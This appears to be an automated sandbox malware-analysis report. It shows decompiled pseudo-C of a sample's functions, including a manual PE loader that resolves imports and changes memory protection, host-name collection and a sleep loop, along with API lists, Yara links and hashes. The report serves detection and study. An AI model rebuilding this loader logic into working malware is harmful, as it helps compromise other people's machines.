Uniqueness

Uniqueness Score: -1.00%

Function 01009A9E, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01009A9E(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E0100546B(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x100d2a4; // 0x460a5a8
						_t20 = _t68 + 0x100e1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E0100A3D7(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x01009aa4
0x01009aa7
0x01009ab7
0x01009ac0
0x01009ac4
0x01009b92
0x01009b98
0x01009b98
0x01009ade
0x01009ae3
0x01009ae7
0x01009aed
0x01009af2
0x01009af9
0x01009b08
0x01009b08
0x01009b0c
0x01009b0e
0x01009b1a
0x01009b25
0x01009b30
0x01009b34
0x01009b3e
0x01009b42
0x01009b44
0x01009b49
0x01009b50
0x01009b60
0x01009b60
0x01009b49
0x01009b42
0x01009b62
0x01009b67
0x01009b6c
0x01009b6c
0x01009b6f
0x01009b78
0x01009b7d
0x01009b7d
0x01009b82
0x01009b87
0x01009b87
0x01009b82
0x01009b0c
0x01009b89
0x01009b8f
0x00000000

APIs

Part of subcall function 0100546B: SysAllocString.OLEAUT32(80000002), ref: 010054C8
Part of subcall function 0100546B: SysFreeString.OLEAUT32(00000000), ref: 0100552E

SysFreeString.OLEAUT32(?), ref: 01009B7D
SysFreeString.OLEAUT32(01009595), ref: 01009B87

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 0759b3a21ef1b3b58522c1620177294ec56cbcda4c218803c1e017bcacb80f99
Instruction ID: 0b03bfb3cc7005945a13bd046d102b82a7cce6c6576c259eaa49844cf0d3fafb
Opcode Fuzzy Hash: 0759b3a21ef1b3b58522c1620177294ec56cbcda4c218803c1e017bcacb80f99
Instruction Fuzzy Hash: F2319C31500509EFDB12DF98C988CEBBBB9FFC9654B104698F9499B251D231EC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E101718, Relevance: 3.1, APIs: 2, Instructions: 59
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E101718() {
				char _v16;
				intOrPtr _v28;
				void _v32;
				void* _v36;
				intOrPtr _t15;
				void* _t16;
				long _t25;
				int _t26;
				void* _t30;
				intOrPtr* _t32;
				signed int _t36;
				intOrPtr _t39;

				_t15 =  *0x6e104144;
				if( *0x6e10412c > 5) {
					_t16 = _t15 + 0x6e1050f9;
				} else {
					_t16 = _t15 + 0x6e1050b1;
				}
				E6E101FB4(_t16, _t16);
				_t36 = 6;
				memset( &_v32, 0, _t36 << 2);
				if(E6E10118F( &_v32,  &_v16,  *0x6e104140 ^ 0xfd7cd1cf) == 0) {
					_t25 = 0xb;
				} else {
					_t26 = lstrlenW( *0x6e104138);
					_t8 = _t26 + 2; // 0x2
					_t11 = _t26 + _t8 + 8; // 0xa
					_t30 = E6E10195D(_t39, _t11,  &_v32,  &_v36); // executed
					if(_t30 == 0) {
						_t32 = _v36;
						 *_t32 = 0;
						if( *0x6e104138 == 0) {
							 *((short*)(_t32 + 4)) = 0;
						} else {
							E6E102034(_t44, _t32 + 4);
						}
					}
					_t25 = E6E101B56(_v28); // executed
				}
				ExitThread(_t25);
			}

0x6e10171e
0x6e10172f
0x6e101739
0x6e101731
0x6e101731
0x6e101731
0x6e101740
0x6e101749
0x6e10174e
0x6e10176c
0x6e1017c8
0x6e10176e
0x6e101774
0x6e10177a
0x6e101788
0x6e10178c
0x6e101793
0x6e10179c
0x6e1017a0
0x6e1017a6
0x6e1017b7
0x6e1017a8
0x6e1017ae
0x6e1017ae
0x6e1017a6
0x6e1017bf
0x6e1017bf
0x6e1017ca

APIs

lstrlenW.KERNEL32(?,?,?,?), ref: 6E101774
ExitThread.KERNEL32 ref: 6E1017CA

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitThreadlstrlen
String ID:
API String ID: 2636182767-0
Opcode ID: a7db0bd4d9f5317b865fa755509adb56f41fb240ab2e391b88dca1cb5bee8b3c
Instruction ID: 08748c53c5aa13a8c8d9870364c28654a0bbe81404d09523b862343173c67648
Opcode Fuzzy Hash: a7db0bd4d9f5317b865fa755509adb56f41fb240ab2e391b88dca1cb5bee8b3c
Instruction Fuzzy Hash: C5119D716086059FDB12DBE4C888F8B77ECAB55348F01891AF641D7190EF34E589AB92

Uniqueness

Uniqueness Score: -1.00%

Function 0100574A, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0100574A(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x100d330;
				E010091D9();
				while(1) {
					_t8 = E0100896F(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E01008ECC(_t14);
					if(_t15 == 0) {
						HeapFree( *0x100d238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E010091D9();
					if(_t19 != 0) {
						_t22 =  *0x100d338; // 0x5619b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x01005752
0x01005756
0x01005757
0x01005758
0x0100575d
0x01005762
0x01005769
0x01005770
0x00000000
0x00000000
0x01005772
0x01005777
0x01005778
0x0100577f
0x01005799
0x00000000
0x01005781
0x01005781
0x01005783
0x01005786
0x0100578a
0x00000000
0x00000000
0x0100578c
0x0100578a
0x010057a1
0x010057a1
0x010057a3
0x010057aa
0x010057ac
0x010057b2
0x010057b9
0x010057c9
0x010057c1
0x010057c4
0x010057c4
0x010057cc
0x010057cc
0x010057d5
0x010057d5
0x0100579f
0x00000000

APIs

Part of subcall function 010091D9: GetProcAddress.KERNEL32(36776F57,01005762), ref: 010091F4

Part of subcall function 0100896F: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 0100899A
Part of subcall function 0100896F: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 010089BC
Part of subcall function 0100896F: memset.NTDLL ref: 010089D6
Part of subcall function 0100896F: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 01008A14
Part of subcall function 0100896F: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 01008A28
Part of subcall function 0100896F: FindCloseChangeNotification.KERNELBASE(00000000), ref: 01008A3F
Part of subcall function 0100896F: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 01008A4B
Part of subcall function 0100896F: lstrcat.KERNEL32(?,642E2A5C), ref: 01008A8C
Part of subcall function 0100896F: FindFirstFileA.KERNELBASE(?,?), ref: 01008AA2

Part of subcall function 01008ECC: lstrlen.KERNEL32(?,00000000,0100D330,00000001,0100577D,0100D00C,0100D00C,00000000,00000005,00000000,00000000,?,?,?,01008880,0100197C), ref: 01008ED5
Part of subcall function 01008ECC: mbstowcs.NTDLL ref: 01008EFC
Part of subcall function 01008ECC: memset.NTDLL ref: 01008F0E

HeapFree.KERNEL32(00000000,0100D00C,0100D00C,0100D00C,00000000,00000005,00000000,00000000,?,?,?,01008880,0100197C,0100D00C,?,0100197C), ref: 01005799

Strings

Uxt, xrefs: 01005799

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID: Uxt
API String ID: 983081259-1536154274
Opcode ID: a3b09de6f077fd8698f3d670914ae4f52e1884a9a06e97c18d443d4a4425a718
Instruction ID: 2cba960ee0d0f49509662d54d453f47efb0395addcf477cd52a0c5d729c9d08c
Opcode Fuzzy Hash: a3b09de6f077fd8698f3d670914ae4f52e1884a9a06e97c18d443d4a4425a718
Instruction Fuzzy Hash: 4A014536600301EEF7135FEAEC80ABA7A98FB40724F14007AFACDC60C0C6649C41AB20

Uniqueness

Uniqueness Score: -1.00%

Function 01001CCE, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01001CCE(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E0100386E(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x100d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E01009CC9(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x01001cce
0x01001cd6
0x01001ced
0x01001d08
0x01001d0c
0x01001d11
0x01001d13
0x01001d25
0x01001d31
0x01001d15
0x01001d15
0x01001d1a
0x01001d1f
0x01001d1f
0x01001d13
0x01001d37
0x01001d3b
0x01001d3b
0x01001ce2
0x01001ce7
0x01001ceb
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 01009CC9: SysFreeString.OLEAUT32(00000000), ref: 01009D2C

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,747DF710,?,00000000,?,00000000,?,0100872D,?,004F0053,05619388,00000000,?), ref: 01001D31

Strings

Uxt, xrefs: 01001D31

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID: Uxt
API String ID: 3806048269-1536154274
Opcode ID: cc55c12f054d964ecbeb56dc0d87d0b0447277fc3219f5ce09da550b637524f3
Instruction ID: 67c1549ff35806d6b146038699d97c5f02be602e952d5384fcc15fb08ee58218
Opcode Fuzzy Hash: cc55c12f054d964ecbeb56dc0d87d0b0447277fc3219f5ce09da550b637524f3
Instruction Fuzzy Hash: A8014F72500619BBEB23AF98CC01EEE7FA5FF14790F048455FE599A160D731DA60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01005369, Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E01005369(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E010098E4(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E01005DE8(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x0100536e
0x01005379
0x0100537b
0x01005381
0x01005383
0x01005388
0x01005391
0x01005395
0x0100539e
0x010053a2
0x010053b1
0x010053a4
0x010053a5
0x010053aa
0x010053aa
0x010053a2
0x01005395
0x010053ba

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,01005F06,747DF710,00000000,?,?,01005F06), ref: 01005381

Part of subcall function 010098E4: RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

GetComputerNameExA.KERNELBASE(00000003,00000000,01005F06,01005F07,?,?,01005F06), ref: 0100539E

Part of subcall function 01005DE8: HeapFree.KERNEL32(00000000,00000000,0100682B,00000000,?,?,00000000), ref: 01005DF4

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 3f9aa24b23e06651d49e3b998f51908e97455b3d5cc93547280eae207de69ee8
Instruction ID: 0671c780a96c040c1b685474aab47653d0833eb873643be5403d8da27f63fab4
Opcode Fuzzy Hash: 3f9aa24b23e06651d49e3b998f51908e97455b3d5cc93547280eae207de69ee8
Instruction Fuzzy Hash: 0BF08936600149BBFB12D6AA8D00FAF77FDDBC5650F11409AAA44D7285EAB0DF01DB70

Uniqueness

Uniqueness Score: -1.00%

Function 01005BF1, Relevance: 3.0, APIs: 2, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x100d23c) == 0) {
						E0100149B();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x100d23c) == 1) {
						_t10 = E0100A1E3(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}

0x01005bf8
0x01005bf9
0x01005bfc
0x01005c2e
0x01005c30
0x01005c30
0x01005bfe
0x01005bff
0x01005c14
0x01005c1b
0x01005c1d
0x01005c1d
0x01005c1b
0x01005bff
0x01005c38

APIs

InterlockedIncrement.KERNEL32(0100D23C), ref: 01005C06

Part of subcall function 0100A1E3: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,01005C19,?), ref: 0100A1F6

InterlockedDecrement.KERNEL32(0100D23C), ref: 01005C26

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: Interlocked$CreateDecrementHeapIncrement
String ID:
API String ID: 3834848776-0
Opcode ID: 89bc054cf1036c7c8d53fb23c732940df7d7949872e9bc58605d499782af38f7
Instruction ID: 3f1391dad546e0f743fb9b8c250790e90bc6395956cac1a8d6001d3611ce39ee
Opcode Fuzzy Hash: 89bc054cf1036c7c8d53fb23c732940df7d7949872e9bc58605d499782af38f7
Instruction Fuzzy Hash: 30E04F3120412E9BF7739FE89D08FAAAB909B21790F058B58F9C2E50D0E618C640DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01009CC9, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E01009CC9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x100d2a4; // 0x460a5a8
				_t4 = _t15 + 0x100e39c; // 0x5618944
				_t20 = _t4;
				_t6 = _t15 + 0x100e124; // 0x650047
				_t17 = E01009A9E(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E01009079(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x01009cd3
0x01009cda
0x01009cdb
0x01009cdc
0x01009cdd
0x01009ce3
0x01009ce8
0x01009ce8
0x01009cf2
0x01009d04
0x01009d0b
0x01009d39
0x01009d0d
0x01009d0f
0x01009d14
0x01009d36
0x01009d16
0x01009d19
0x01009d20
0x01009d25
0x01009d27
0x01009d27
0x01009d2c
0x01009d2c
0x01009d14
0x01009d40

APIs

Part of subcall function 01009A9E: SysFreeString.OLEAUT32(?), ref: 01009B7D

Part of subcall function 01009079: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,01008E57,004F0053,00000000,?), ref: 01009082
Part of subcall function 01009079: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,01008E57,004F0053,00000000,?), ref: 010090AC
Part of subcall function 01009079: memset.NTDLL ref: 010090C0

SysFreeString.OLEAUT32(00000000), ref: 01009D2C

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 55ce089fb18458d174943dee8d32857e50eb2087bbc141df7a752eec3474ae60
Instruction ID: c9441d0d82c1f8c95f8bbc80645ac4909564970203ba2ffe3d9b2d00ed54194e
Opcode Fuzzy Hash: 55ce089fb18458d174943dee8d32857e50eb2087bbc141df7a752eec3474ae60
Instruction Fuzzy Hash: 2201753154011ABFEB13EFE8CD049EEBBB8FB04254F004566EA89E70A2E7719A11C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E101FB4, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E101FB4(void* __eax, intOrPtr _a4) {

				 *0x6e104150 =  *0x6e104150 & 0x00000000;
				_push(0);
				_push(0x6e10414c);
				_push(1);
				_push(_a4);
				 *0x6e104148 = 0xc; // executed
				L6E101B50(); // executed
				return __eax;
			}

0x6e101fb4
0x6e101fbb
0x6e101fbd
0x6e101fc2
0x6e101fc4
0x6e101fc8
0x6e101fd2
0x6e101fd7

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(6E101745,00000001,6E10414C,00000000), ref: 6E101FD2

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: fd4f161e3d61f21cf03995ffaf37c5eaefa76f3569702b3a940674234255f788
Instruction ID: 0a2c785cdc9f9b1a97b9ba4fa72855d9f9e8b096a2c661d5fba48a6eb942b445
Opcode Fuzzy Hash: fd4f161e3d61f21cf03995ffaf37c5eaefa76f3569702b3a940674234255f788
Instruction Fuzzy Hash: 01C04C74140740A7EB20AB808C89F467A6177B5709F114508F110262C0DFB52099A555

Uniqueness

Uniqueness Score: -1.00%

Function 010098E4, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010098E4(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x100d238, 0, _a4); // executed
				return _t2;
			}

0x010098f0
0x010098f6

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,01006788), ref: 010098F0

Memory Dump Source

Source File: 00000003.00000002.592432168.0000000001001000.00000020.00000001.sdmp, Offset: 01000000, based on PE: true

Associated: 00000003.00000002.592422230.0000000001000000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592451832.000000000100C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.592461179.000000000100D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.592470319.000000000100F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c760d205cefe786b225c0ee392b94a859a3314bb26789e26424ee8aeafdd5233
Instruction ID: 56657b5eb1e7ceb25260579bd473f6b41c23ce06c0e02014694870f8fe4588ce
Opcode Fuzzy Hash: c760d205cefe786b225c0ee392b94a859a3314bb26789e26424ee8aeafdd5233
Instruction Fuzzy Hash: 16B01231000100ABDA238B80DE08F05BB21BB60700F118210B284440B8833B4460EB14

Uniqueness

Uniqueness Score: -1.00%

Function 6E101B56, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6E101B56(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e104140;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e104140 - 0x63698bc4 &  !( *0x6e104140 - 0x63698bc4);
				_t18 = E6E101879( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e104140 - 0x63698bc4 &  !( *0x6e104140 - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e104140 - 0x63698bc4 &  !( *0x6e104140 - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E1013B1(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t29 = E6E10160D(_t40, _t44);
						if(_t29 == 0) {
							_t26 = E6E1010AD(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E10105D(_t42);
					L8:
					return _t29;
				}
			}

0x6e101b5e
0x6e101b60
0x6e101b7c
0x6e101b8d
0x6e101b94
0x6e101bf2
0x00000000
0x6e101b96
0x6e101b96
0x6e101ba0
0x6e101ba4
0x6e101ba9
0x6e101bb1
0x6e101bb5
0x6e101bba
0x6e101bbf
0x6e101bc3
0x6e101bc8
0x6e101bc9
0x6e101bcd
0x6e101bd2
0x6e101bda
0x6e101bda
0x6e101bd2
0x6e101bc3
0x6e101bb5
0x6e101bdc
0x6e101be5
0x6e101be9
0x6e101bf3
0x6e101bf9
0x6e101bf9

APIs

Part of subcall function 6E101879: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E101B92,?,?,?,?,?,00000002,?,?), ref: 6E10189D
Part of subcall function 6E101879: GetProcAddress.KERNEL32(00000000,?), ref: 6E1018BF
Part of subcall function 6E101879: GetProcAddress.KERNEL32(00000000,?), ref: 6E1018D5
Part of subcall function 6E101879: GetProcAddress.KERNEL32(00000000,?), ref: 6E1018EB
Part of subcall function 6E101879: GetProcAddress.KERNEL32(00000000,?), ref: 6E101901
Part of subcall function 6E101879: GetProcAddress.KERNEL32(00000000,?), ref: 6E101917

Part of subcall function 6E1013B1: memcpy.NTDLL(00000002,?,6E101BA0,?,?,?,?,?,6E101BA0,?,?,?,?,?,?,?), ref: 6E1013E8
Part of subcall function 6E1013B1: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 6E10141D

Part of subcall function 6E10160D: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6E101645

Part of subcall function 6E1010AD: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E1010E6
Part of subcall function 6E1010AD: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E10115B
Part of subcall function 6E1010AD: GetLastError.KERNEL32 ref: 6E101161

GetLastError.KERNEL32(?,?), ref: 6E101BD4

Memory Dump Source

Source File: 00000003.00000002.597496748.000000006E101000.00000020.00020000.sdmp, Offset: 6E100000, based on PE: true

Associated: 00000003.00000002.597478453.000000006E100000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597518069.000000006E103000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.597561298.000000006E105000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.597576347.000000006E106000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: a9cb4ee37a670a43503868a43537c9af3a6cd64b9ef4262d91e7b04a1daee37b
Instruction ID: 8e444e763c3e006ef7b55dae0fe3bf7954538853c93de4392863af6e44f24df7
Opcode Fuzzy Hash: a9cb4ee37a670a43503868a43537c9af3a6cd64b9ef4262d91e7b04a1daee37b
Instruction Fuzzy Hash: 501126767006016FC710EAE98C80D9B77BCBF8821C7044519EA0197605FFA9E94A97A0

Uniqueness

Uniqueness Score: -1.00%

Function 01008803, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E01008803(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
